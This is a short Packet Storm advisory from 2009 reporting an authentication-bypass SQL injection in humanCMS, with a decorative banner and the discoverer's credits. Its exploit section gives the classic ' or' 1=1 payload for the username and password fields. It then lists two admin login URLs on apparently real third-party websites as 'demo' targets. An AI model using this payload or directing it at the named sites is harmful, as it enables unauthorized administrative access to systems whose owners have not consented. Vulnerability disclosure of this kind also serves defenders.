humanCMS SQL Injection

2009-08-24T00:00:00
ID PACKETSTORM:80561
Type packetstorm
Reporter next
Modified 2009-08-24T00:00:00

Description

                                        
                                            `()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()  
() ()  
() f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer ()   
() ()  
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()  
[+] humanCMS (Auth Bypass) SQL Injection Vulnerability  
[+] Discovered by next  
[+] www.sa3eka.com ()()()()() www.m4r0c-s3curity.cc  
[+] vie.0[at]hotmail.com  
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()  
  
[+] Home Page : http://www.squarelabel.com  
"humanCMS site description"  
  
[+] Auth Bypass  
  
[+] expolit : username : ' or' 1=1  
password : ' or' 1=1  
  
[+] admin login demo :  
http://www.festivalcite.ch/index.php?id=&action=login  
http://www.squarelabel.com/index.php?id=&action=login  
  
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()  
  
  
`